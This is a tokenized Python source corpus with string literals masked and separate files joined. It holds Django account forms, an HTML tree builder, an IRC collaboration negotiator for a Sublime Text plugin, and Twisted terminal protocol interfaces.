'<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> password = forms . CharField ( <EOL> widget = forms . PasswordInput , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> confirm_password = forms . CharField ( <EOL> widget = forms . PasswordInput , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> def clean ( self ) : <EOL> """<STR_LIT>""" <EOL> cleaned_data = super ( ActivateAccountForm , self ) . clean ( ) <EOL> password1 = cleaned_data . get ( '<STR_LIT:password>' ) <EOL> password2 = cleaned_data . get ( '<STR_LIT>' ) <EOL> if password1 != password2 : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' ) <EOL> return cleaned_data <EOL> class BaseSkillFormSet ( BaseFormSet ) : <EOL> def clean ( self ) : <EOL> """<STR_LIT>""" <EOL> if any ( self . errors ) : <EOL> return <EOL> skills = [ ] <EOL> for form in self . forms : <EOL> if form . cleaned_data : <EOL> skill = form . cleaned_data [ '<STR_LIT>' ] <EOL> proficiency = form . cleaned_data [ '<STR_LIT>' ] <EOL> if skill and proficiency : <EOL> if skill in skills : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> skills . append ( skill ) <EOL> if skill and not proficiency : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> elif proficiency and not skill : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> @ parsleyfy <EOL> class SkillForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> skills = Skill . objects . all ( ) <EOL> skill = forms . ModelChoiceField ( queryset = skills , required = False ) <EOL> proficiency = forms . ChoiceField ( choices = UserSkill . PROFICIENCY_CHOICES , <EOL> required = False ) <EOL> class BaseLinkFormSet ( BaseFormSet ) : <EOL> def clean ( self ) : <EOL> """<STR_LIT>""" <EOL> if any ( self . errors ) : <EOL> return <EOL> anchors = [ ] <EOL> urls = [ ] <EOL> duplicates = False <EOL> for form in self . forms : <EOL> if form . cleaned_data : <EOL> anchor = form . cleaned_data [ '<STR_LIT>' ] <EOL> url = form . cleaned_data [ '<STR_LIT:url>' ] <EOL> if anchor and url : <EOL> if anchor in anchors : <EOL> duplicates = True <EOL> anchors . append ( anchor ) <EOL> if url in urls : <EOL> duplicates = True <EOL> urls . append ( url ) <EOL> if duplicates : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> if url and not anchor : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> elif anchor and not url : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> @ parsleyfy <EOL> class LinkForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> anchor = forms . CharField ( max_length = <NUM_LIT:100> , <EOL> widget = forms . TextInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } ) , <EOL> required = False ) <EOL> url = forms . URLField ( <EOL> widget = forms . URLInput ( attrs = { '<STR_LIT>' : _ ( '<STR_LIT>' ) } ) , <EOL> error_messages = { '<STR_LIT>' : _ ( '<STR_LIT>' ) } , <EOL> required = False ) <EOL> class RoleModelMultipleChoiceField ( forms . ModelMultipleChoiceField ) : <EOL> def label_from_instance ( self , obj ) : <EOL> label = "<STR_LIT>" . format ( obj . name , obj . description ) <EOL> return mark_safe ( label ) <EOL> @ parsleyfy <EOL> class ProfileForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' , None ) <EOL> super ( ProfileForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] = forms . CharField ( <EOL> max_length = <NUM_LIT:30> , <EOL> initial = self . user . full_name , <EOL> widget = forms . TextInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT:Name>' ) , <EOL> } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> self . fields [ '<STR_LIT>' ] = forms . CharField ( <EOL> initial = self . user . bio , <EOL> widget = forms . Textarea ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) , <EOL> required = False ) <EOL> roles = Role . objects . all ( ) <EOL> self . fields [ '<STR_LIT>' ] = RoleModelMultipleChoiceField ( <EOL> initial = self . user . roles . all ( ) , <EOL> queryset = roles , <EOL> widget = forms . CheckboxSelectMultiple ( ) , <EOL> required = False ) <EOL> @ parsleyfy <EOL> class UpdateEmailForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' , None ) <EOL> super ( UpdateEmailForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:email>' ] = forms . EmailField ( <EOL> initial = self . user . email , <EOL> widget = forms . EmailInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> self . fields [ '<STR_LIT:password>' ] = forms . CharField ( <EOL> widget = forms . PasswordInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } ) <EOL> def clean_email ( self ) : <EOL> email = self . cleaned_data [ '<STR_LIT:email>' ] <EOL> if email != self . user . email : <EOL> validate_email_availability ( email ) <EOL> return email <EOL> def clean_password ( self ) : <EOL> password = self . cleaned_data [ '<STR_LIT:password>' ] <EOL> if not self . user . check_password ( password ) : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> else : <EOL> pass <EOL> @ parsleyfy <EOL> class UpdatePasswordForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' , None ) <EOL> super ( UpdatePasswordForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] = forms . CharField ( <EOL> widget = forms . PasswordInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> self . fields [ '<STR_LIT>' ] = forms . CharField ( <EOL> widget = forms . PasswordInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> def clean_current_password ( self ) : <EOL> current_password = self . cleaned_data [ '<STR_LIT>' ] <EOL> if not self . user . check_password ( current_password ) : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> else : <EOL> pass <EOL> @ parsleyfy <EOL> class CloseAccountForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' , None ) <EOL> super ( CloseAccountForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:password>' ] = forms . CharField ( <EOL> widget = forms . PasswordInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> def clean_password ( self ) : <EOL> """<STR_LIT>""" <EOL> password = self . cleaned_data . get ( '<STR_LIT:password>' ) <EOL> if not self . user . check_password ( password ) : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> else : <EOL> pass </s>
<s> from django import forms <EOL> from connect . accounts . models import Role , Skill <EOL> class FilterMemberForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> skills = forms . ModelMultipleChoiceField ( <EOL> queryset = Skill . objects . all ( ) , <EOL> widget = forms . CheckboxSelectMultiple ( ) , <EOL> required = False ) <EOL> roles = forms . ModelMultipleChoiceField ( <EOL> queryset = Role . objects . all ( ) , <EOL> widget = forms . CheckboxSelectMultiple ( ) , <EOL> required = False ) </s>
<s> import htmlentitydefs <EOL> import re , string , sys <EOL> import mimetools , StringIO <EOL> import ElementTree <EOL> AUTOCLOSE = "<STR_LIT:p>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:body>" <EOL> IGNOREEND = "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" <EOL> if sys . version [ : <NUM_LIT:3> ] == "<STR_LIT>" : <EOL> is_not_ascii = re . compile ( r"<STR_LIT>" ) . search <EOL> else : <EOL> is_not_ascii = re . compile ( eval ( r'<STR_LIT>' ) ) . search <EOL> try : <EOL> from HTMLParser import HTMLParser <EOL> except ImportError : <EOL> from sgmllib import SGMLParser <EOL> class HTMLParser ( SGMLParser ) : <EOL> def unknown_starttag ( self , tag , attrs ) : <EOL> self . handle_starttag ( tag , attrs ) <EOL> def unknown_endtag ( self , tag ) : <EOL> self . handle_endtag ( tag ) <EOL> class HTMLTreeBuilder ( HTMLParser ) : <EOL> def __init__ ( self , builder = None , encoding = None ) : <EOL> self . __stack = [ ] <EOL> if builder is None : <EOL> builder = ElementTree . TreeBuilder ( ) <EOL> self . __builder = builder <EOL> self . encoding = encoding or "<STR_LIT>" <EOL> HTMLParser . __init__ ( self ) <EOL> def close ( self ) : <EOL> HTMLParser . close ( self ) <EOL> return self . __builder . close ( ) <EOL> def handle_starttag ( self , tag , attrs ) : <EOL> if tag == "<STR_LIT>" : <EOL> http_equiv = content = None <EOL> for k , v in attrs : <EOL> if k == "<STR_LIT>" : <EOL> http_equiv = string . lower ( v ) <EOL> elif k == "<STR_LIT:content>" : <EOL> content = v <EOL> if http_equiv == "<STR_LIT>" and content : <EOL> header = mimetools . Message ( <EOL> StringIO . StringIO ( "<STR_LIT>" % ( http_equiv , content ) ) <EOL> ) <EOL> encoding = header . getparam ( "<STR_LIT>" ) <EOL> if encoding : <EOL> self . encoding = encoding <EOL> if tag in AUTOCLOSE : <EOL> if self . __stack and self . __stack [ - <NUM_LIT:1> ] == tag : <EOL> self . handle_endtag ( tag ) <EOL> self . __stack . append ( tag ) <EOL> attrib = { } <EOL> if attrs : <EOL> for k , v in attrs : <EOL> attrib [ string . lower ( k ) ] = v <EOL> self . __builder . start ( tag , attrib ) <EOL> if tag in IGNOREEND : <EOL> self . __stack . pop ( ) <EOL> self . __builder . end ( tag ) <EOL> def handle_endtag ( self , tag ) : <EOL> if tag in IGNOREEND : <EOL> return <EOL> lasttag = self . __stack . pop ( ) <EOL> if tag != lasttag and lasttag in AUTOCLOSE : <EOL> self . handle_endtag ( lasttag ) <EOL> self . __builder . end ( tag ) <EOL> def handle_charref ( self , char ) : <EOL> if char [ : <NUM_LIT:1> ] == "<STR_LIT:x>" : <EOL> char = int ( char [ <NUM_LIT:1> : ] , <NUM_LIT:16> ) <EOL> else : <EOL> char = int ( char ) <EOL> if <NUM_LIT:0> <= char < <NUM_LIT> : <EOL> self . __builder . data ( chr ( char ) ) <EOL> else : <EOL> self . __builder . data ( unichr ( char ) ) <EOL> def handle_entityref ( self , name ) : <EOL> entity = htmlentitydefs . entitydefs . get ( name ) <EOL> if entity : <EOL> if len ( entity ) == <NUM_LIT:1> : <EOL> entity = ord ( entity ) <EOL> else : <EOL> entity = int ( entity [ <NUM_LIT:2> : - <NUM_LIT:1> ] ) <EOL> if <NUM_LIT:0> <= entity < <NUM_LIT> : <EOL> self . __builder . data ( chr ( entity ) ) <EOL> else : <EOL> self . __builder . data ( unichr ( entity ) ) <EOL> else : <EOL> self . unknown_entityref ( name ) <EOL> def handle_data ( self , data ) : <EOL> if isinstance ( data , type ( '<STR_LIT>' ) ) and is_not_ascii ( data ) : <EOL> data = unicode ( data , self . encoding , "<STR_LIT:ignore>" ) <EOL> self . __builder . data ( data ) <EOL> def unknown_entityref ( self , name ) : <EOL> pass <EOL> TreeBuilder = HTMLTreeBuilder <EOL> def parse ( source , encoding = None ) : <EOL> return ElementTree . parse ( source , HTMLTreeBuilder ( encoding = encoding ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import sys <EOL> ElementTree . dump ( parse ( open ( sys . argv [ <NUM_LIT:1> ] ) ) ) </s>
<s> from zope . interface import implements <EOL> from sub_collab . negotiator import base <EOL> from sub_collab . peer import basic <EOL> from sub_collab import common , event , registry , status_bar <EOL> from twisted . words . protocols import irc <EOL> from twisted . internet import reactor , ssl , protocol , error , defer <EOL> import logging , sys , socket , functools <EOL> import sublime <EOL> class IRCNegotiator ( base . BaseNegotiator , common . Observable , protocol . ClientFactory , base . PatchedIRCClient ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> versionName = '<STR_LIT>' <EOL> versionNum = '<STR_LIT>' <EOL> versionEnv = "<STR_LIT>" <EOL> negotiateCallback = None <EOL> onNegotiateCallback = None <EOL> rejectedOrFailedCallback = None <EOL> def __init__ ( self , id , config ) : <EOL> common . Observable . __init__ ( self ) <EOL> base . BaseNegotiator . __init__ ( self , id , config ) <EOL> base . PatchedIRCClient . __init__ ( self ) <EOL> assert config . has_key ( '<STR_LIT:host>' ) , '<STR_LIT>' <EOL> assert config . has_key ( '<STR_LIT:port>' ) , '<STR_LIT>' <EOL> assert config . has_key ( '<STR_LIT:username>' ) , '<STR_LIT>' <EOL> assert config . has_key ( '<STR_LIT>' ) , '<STR_LIT>' <EOL> self . clientConnection = None <EOL> self . host = self . config [ '<STR_LIT:host>' ] . encode ( ) <EOL> self . port = int ( self . config [ '<STR_LIT:port>' ] ) <EOL> self . nickname = self . config [ '<STR_LIT:username>' ] . encode ( ) <EOL> if self . config . has_key ( '<STR_LIT:password>' ) : <EOL> self . password = self . config [ '<STR_LIT:password>' ] . encode ( ) <EOL> if self . config . has_key ( '<STR_LIT>' ) : <EOL> self . useSSL = self . config [ '<STR_LIT>' ] <EOL> else : <EOL> self . useSSL = False <EOL> self . channel = self . config [ '<STR_LIT>' ] . encode ( ) <EOL> self . peerUsers = [ ] <EOL> self . unverifiedUsers = None <EOL> self . connectionFailed = False <EOL> self . pendingSession = None <EOL> self . hostAddressToTryQueue = None <EOL> def connect ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . isConnected ( ) : <EOL> return <EOL> if self . clientConnection : <EOL> self . clientConnection . disconnect ( ) <EOL> status_bar . status_message ( '<STR_LIT>' % self . str ( ) ) <EOL> if self . useSSL : <EOL> self . logger . info ( '<STR_LIT>' % self . str ( ) ) <EOL> self . clientConnection = reactor . connectSSL ( self . host , self . port , self , ssl . ClientContextFactory ( ) ) <EOL> else : <EOL> self . logger . info ( '<STR_LIT>' % self . str ( ) ) <EOL> self . clientConnection = reactor . connectTCP ( self . host , self . port , self ) <EOL> def isConnected ( self ) : <EOL> """<STR_LIT>""" <EOL> connected = None <EOL> if self . clientConnection : <EOL> if self . _registered : <EOL> connected = True <EOL> else : <EOL> connected = False <EOL> return connected <EOL> def disconnect ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . clientConnection : <EOL> if self . clientConnection . state == '<STR_LIT>' : <EOL> self . clientConnection = None <EOL> self . _registered = False <EOL> self . peerUsers = None <EOL> else : <EOL> self . clientConnection . disconnect ( ) <EOL> self . logger . info ( '<STR_LIT>' % self . host ) <EOL> status_bar . status_message ( '<STR_LIT>' % self . str ( ) ) <EOL> self . clientConnection = None <EOL> self . _registered = False <EOL> self . peerUsers = None <EOL> self . unverifiedUsers = None <EOL> def listUsers ( self ) : <EOL> """<STR_LIT>""" <EOL> fullList = [ ] <EOL> if self . peerUsers : <EOL> for peer in self . peerUsers : <EOL> fullList . append ( peer ) <EOL> if self . unverifiedUsers : <EOL> for unverified in self . unverifiedUsers : <EOL> fullList . append ( '<STR_LIT:*>' + unverified ) <EOL> return fullList <EOL> def getUserName ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . nickname <EOL> def negotiateSession ( self , username ) : <EOL> """<STR_LIT>""" <EOL> if ( not username in self . peerUsers ) and ( not username in self . unverifiedUsers ) : <EOL> self . addUserToLists ( username ) <EOL> if self . hostAddressToTryQueue == None or len ( self . hostAddressToTryQueue ) == <NUM_LIT:0> : <EOL> self . hostAddressToTryQueue = socket . gethostbyname_ex ( socket . gethostname ( ) ) [ <NUM_LIT:2> ] <EOL> ipaddress = self . hostAddressToTryQueue . pop ( ) <EOL> session = basic . BasicPeer ( username , self ) <EOL> port = session . hostConnect ( ) <EOL> self . logger . debug ( '<STR_LIT>' % ( username , ipaddress , port ) ) <EOL> status_bar . status_message ( '<STR_LIT>' % ( username , ipaddress ) ) <EOL> self . pendingSession = session <EOL> registry . registerSession ( session ) <EOL> self . ctcpMakeQuery ( username , [ ( '<STR_LIT>' , '<STR_LIT>' % ( base . DCC_PROTOCOL_COLLABORATE , ipaddress , port ) ) ] ) <EOL> def acceptSessionRequest ( self , username , host , port ) : <EOL> self . logger . debug ( '<STR_LIT>' % ( username , host , port ) ) <EOL> status_bar . status_message ( '<STR_LIT>' % ( username , host , port ) ) <EOL> self . logger . info ( '<STR_LIT>' % ( username , host , port ) ) <EOL> session = basic . BasicPeer ( username , self ) <EOL> session . clientConnect ( host , port ) <EOL> registry . registerSession ( session ) <EOL> def rejectSessionRequest ( self , username ) : <EOL> self . logger . debug ( '<STR_LIT>' % username ) <EOL> self . msg ( username , base . SESSION_REJECTED ) <EOL> def retrySessionRequest ( self , username ) : <EOL> self . logger . debug ( '<STR_LIT>' % username ) <EOL> self . msg ( username , base . SESSION_RETRY ) <EOL> def buildProtocol ( self , addr ) : <EOL> return self <EOL> def clientConnectionLost ( self , connector , reason ) : <EOL> if error . ConnectionDone == reason . type : <EOL> self . disconnect ( ) <EOL> else : <EOL> self . logger . error ( '<STR_LIT>' % ( reason . type , reason . value ) ) <EOL> status_bar . status_message ( '<STR_LIT>' % self . str ( ) ) <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> self . logger . error ( '<STR_LIT>' % ( reason . type , reason . value ) ) <EOL> status_bar . status_message ( '<STR_LIT>' % self . str ( ) ) <EOL> self . connectionFailed = True <EOL> self . disconnect ( ) <EOL> def connectionMade ( self ) : <EOL> self . logger . debug ( '<STR_LIT>' ) <EOL> base . PatchedIRCClient . connectionMade ( self ) <EOL> self . logger . info ( '<STR_LIT>' + self . host ) <EOL> def signedOn ( self ) : <EOL> status_bar . status_message ( '<STR_LIT>' + self . str ( ) ) <EOL> self . logger . info ( '<STR_LIT>' + self . channel ) <EOL> self . join ( self . channel ) <EOL> def joined ( self , channel ) : <EOL> self . logger . info ( '<STR_LIT>' + self . channel ) <EOL> self . names ( self . channel ) <EOL> def channelNames ( self , channel , names ) : <EOL> assert self . channel == channel . lstrip ( irc . CHANNEL_PREFIXES ) <EOL> names . remove ( self . nickname ) <EOL> self . logger . debug ( '<STR_LIT>' % names ) <EOL> self . unverifiedUsers = [ ] <EOL> self . peerUsers = [ ] <EOL> for name in names : <EOL> self . addUserToLists ( name ) <EOL> def userJoined ( self , user , channel ) : <EOL> assert self . channel == channel . lstrip ( irc . CHANNEL_PREFIXES ) <EOL> self . addUserToLists ( user ) <EOL> def userLeft ( self , user , channel ) : <EOL> assert self . channel == channel . lstrip ( irc . CHANNEL_PREFIXES ) <EOL> self . dropUserFromLists ( user ) <EOL> def userQuit ( self , user , quitMessage ) : <EOL> self . dropUserFromLists ( user ) <EOL> def userKicked ( self , kickee , channel , kicker , message ) : <EOL> assert self . channel == channel . lstrip ( irc . CHANNEL_PREFIXES ) <EOL> self . dropUserFromLists ( user ) <EOL> def userRenamed ( self , oldname , newname ) : <EOL> assert self . channel == channel . lstrip ( irc . CHANNEL_PREFIXES ) <EOL> self . dropUserFromLists ( oldname ) <EOL> self . addUserToLists ( newname ) <EOL> def privmsg ( self , user , channel , message ) : <EOL> """<STR_LIT>""" <EOL> username = user . lstrip ( self . getNickPrefixes ( ) ) <EOL> if '<STR_LIT:!>' in username : <EOL> username = username . split ( '<STR_LIT:!>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . logger . debug ( '<STR_LIT>' % ( message , username ) ) <EOL> if message == base . SESSION_RETRY : <EOL> registry . removeSession ( self . pendingSession ) <EOL> self . pendingSession . disconnect ( ) ; <EOL> self . pendingSession = None <EOL> self . negotiateSession ( username ) <EOL> elif message == base . SESSION_FAILED : <EOL> self . logger . warn ( '<STR_LIT>' ) <EOL> registry . removeSession ( self . pendingSession ) <EOL> self . pendingSession . disconnect ( ) ; <EOL> self . pendingSession = None <EOL> elif message == base . SESSION_REJECTED : <EOL> self . logger . info ( '<STR_LIT>' % username ) <EOL> registry . removeSession ( self . pendingSession ) <EOL> self . pendingSession . disconnect ( ) ; <EOL> self . pendingSession = None <EOL> def ctcpReply_VERSION ( self , user , channel , data ) : <EOL> username = user . lstrip ( self . getNickPrefixes ( ) ) <EOL> if '<STR_LIT:!>' in username : <EOL> username = username . split ( '<STR_LIT:!>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if ( data == ( '<STR_LIT>' % ( self . versionName , self . versionNum , self . versionEnv ) ) ) or ( ( self . versionName in data ) and ( self . versionNum in data ) and ( self . versionEnv in data ) ) : <EOL> self . logger . debug ( '<STR_LIT>' % username ) <EOL> self . peerUsers . append ( username ) <EOL> self . unverifiedUsers . remove ( username ) <EOL> else : <EOL> self . unverifiedUsers . remove ( username ) <EOL> def dccDoChat ( self , user , channel , protocol , address , port , data ) : <EOL> """<STR_LIT>""" <EOL> username = user . lstrip ( self . getNickPrefixes ( ) ) <EOL> if '<STR_LIT:!>' in username : <EOL> username = username . split ( '<STR_LIT:!>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . logger . debug ( '<STR_LIT>' % ( username , protocol , address , port ) ) <EOL> if protocol == base . DCC_PROTOCOL_COLLABORATE or protocol == base . DCC_PROTOCOL_RETRY : <EOL> self . notify ( event . INCOMING_SESSION_REQUEST , self , ( username , address , port ) ) <EOL> def dropUserFromLists ( self , user ) : <EOL> username = user . lstrip ( self . getNickPrefixes ( ) ) <EOL> if username in self . peerUsers : <EOL> self . peerUsers . remove ( username ) <EOL> if username in self . unverifiedUsers : <EOL> self . unverifiedUsers . remove ( username ) <EOL> def addUserToLists ( self , user ) : <EOL> username = user . lstrip ( self . getNickPrefixes ( ) ) <EOL> self . unverifiedUsers . append ( username ) <EOL> self . ctcpMakeQuery ( user , [ ( '<STR_LIT>' , None ) ] ) <EOL> def getNickPrefixes ( self ) : <EOL> if not self . _nickprefixes : <EOL> self . _nickprefixes = '<STR_LIT>' <EOL> prefixes = self . supported . getFeature ( '<STR_LIT>' , { } ) <EOL> for prefixTuple in prefixes . itervalues ( ) : <EOL> self . _nickprefixes = self . _nickprefixes + prefixTuple [ <NUM_LIT:0> ] <EOL> return self . _nickprefixes <EOL> def str ( self ) : <EOL> return '<STR_LIT>' % ( self . nickname , self . host , self . port ) </s>
<s> """<STR_LIT>""" <EOL> from zope . interface import implements , Interface <EOL> from twisted . internet import protocol , defer , interfaces as iinternet <EOL> class ITerminalProtocol ( Interface ) : <EOL> def makeConnection ( transport ) : <EOL> """<STR_LIT>""" <EOL> def keystrokeReceived ( keyID , modifier ) : <EOL> """<STR_LIT>""" <EOL> def terminalSize ( width , height ) : <EOL> """<STR_LIT>""" <EOL> def unhandledControlSequence ( seq ) : <EOL> """<STR_LIT>""" <EOL> def connectionLost ( reason ) : <EOL> """<STR_LIT>""" <EOL> class TerminalProtocol ( object ) : <EOL> implements ( ITerminalProtocol ) <EOL> def makeConnection ( self , terminal ) : <EOL> self . terminal = terminal <EOL> self . connectionMade ( ) <EOL> def connectionMade ( self ) : <EOL> """<STR_LIT>""" <EOL> def keystrokeReceived ( self , keyID , modifier ) : <EOL> pass <EOL> def terminalSize ( self , width , height ) : <EOL> pass <EOL> def unhandledControlSequence ( self , seq ) : <EOL> pass <EOL> def connectionLost ( self , reason ) : <EOL> pass <EOL> class ITerminalTransport ( iinternet . ITransport ) : <EOL> def cursorUp ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def cursorDown ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def cursorForward ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def cursorBackward ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def cursorPosition ( column , line ) : <EOL> """<STR_LIT>""" <EOL> def cursorHome ( ) : <EOL> """<STR_LIT>""" <EOL> def index ( ) : <EOL> """<STR_LIT>""" <EOL> def reverseIndex ( ) : <EOL> """<STR_LIT>""" <EOL> def nextLine ( ) : <EOL> """<STR_LIT>""" <EOL> def saveCursor ( ) : <EOL> """<STR_LIT>""" <EOL> def restoreCursor ( ) : <EOL> """<STR_LIT>""" <EOL> def setModes ( modes ) : <EOL> """<STR_LIT>""" <EOL> def resetModes ( mode ) : <EOL> """<STR_LIT>""" <EOL> def setPrivateModes ( modes ) : <EOL> """<STR_LIT>""" <EOL> def resetPrivateModes ( modes ) : <EOL> """<STR_LIT>""" <EOL> def applicationKeypadMode ( ) : <EOL> """<STR_LIT>""" <EOL> def numericKeypadMode ( ) : <EOL> """<STR_LIT>""" <EOL> def selectCharacterSet ( charSet , which ) : <EOL> """<STR_LIT>""" <EOL> def shiftIn ( ) : <EOL> """<STR_LIT>""" <EOL> def shiftOut ( ) : <EOL> """<STR_LIT>""" <EOL> def singleShift2 ( ) : <EOL> """<STR_LIT>""" <EOL> def singleShift3 ( ) : <EOL> """<STR_LIT>""" <EOL> def selectGraphicRendition ( * attributes ) : <EOL> """<STR_LIT>""" <EOL> def horizontalTabulationSet ( ) : <EOL> """<STR_LIT>""" <EOL> def tabulationClear ( ) : <EOL> """<STR_LIT>""" <EOL> def tabulationClearAll ( ) : <EOL> """<STR_LIT>""" <EOL> def doubleHeightLine ( top = True ) : <EOL> """<STR_LIT>""" <EOL> def singleWidthLine ( ) : <EOL> """<STR_LIT>""" <EOL> def doubleWidthLine ( ) : <EOL> """<STR_LIT>""" <EOL> def eraseToLineEnd ( ) : <EOL> """<STR_LIT>""" <EOL> def eraseToLineBeginning ( ) : <EOL> """<STR_LIT>""" <EOL> def eraseLine ( ) : <EOL> """<STR_LIT>""" <EOL> def eraseToDisplayEnd ( ) : <EOL> """<STR_LIT>""" <EOL> def eraseToDisplayBeginning ( ) : <EOL> """<STR_LIT>""" <EOL> def eraseDisplay ( ) : <EOL> """<STR_LIT>""" <EOL> def deleteCharacter ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def insertLine ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def deleteLine ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def reportCursorPosition ( ) : <EOL> """<STR_LIT>""" <EOL> def reset ( ) : <EOL> """<STR_LIT>""" <EOL> def unhandledControlSequence ( seq ) : <EOL> """<STR_LIT>""" <EOL> CSI = '<STR_LIT>' <EOL> CST = { '<STR_LIT>' : '<STR_LIT>' } <EOL> class modes : <EOL> """<STR_LIT>""" <EOL> KEYBOARD_ACTION = KAM = <NUM_LIT:2> <EOL> INSERTION_REPLACEMENT = IRM = <NUM_LIT:4> <EOL> LINEFEED_NEWLINE = LNM = <NUM_LIT:20> <EOL> class privateModes : <EOL> """<STR_LIT>""" <EOL> ERROR = <NUM_LIT:0> <EOL> CURSOR_KEY = <NUM_LIT:1> <EOL> ANSI_VT52 = <NUM_LIT:2> <EOL> COLUMN = <NUM_LIT:3> <EOL> SCROLL = <NUM_LIT:4> <EOL> SCREEN = <NUM_LIT:5> <EOL> ORIGIN = <NUM_LIT:6> <EOL> AUTO_WRAP = <NUM_LIT:7> <EOL> AUTO_REPEAT = <NUM_LIT:8> <EOL> PRINTER_FORM_FEED = <NUM_LIT> <EOL> PRINTER_EXTENT = <NUM_LIT> <EOL> CURSOR_MODE = <NUM_LIT> <EOL> CS_US = '<STR_LIT>' <EOL> CS_UK = '<STR_LIT>' <EOL> CS_DRAWING = '<STR_LIT>' <EOL> CS_ALTERNATE = '<STR_LIT>' <EOL> CS_ALTERNATE_SPECIAL = '<STR_LIT>' <EOL> G0 = '<STR_LIT>' <EOL> G1 = '<STR_LIT>' <EOL> G2 = '<STR_LIT>' <EOL> G3 = '<STR_LIT>' <EOL> NORMAL = <NUM_LIT:0> <EOL> BOLD = <NUM_LIT:1> <EOL> UNDERLINE = <NUM_LIT:4> <EOL> BLINK = <NUM_LIT:5> <EOL> REVERSE_VIDEO = <NUM_LIT:7> 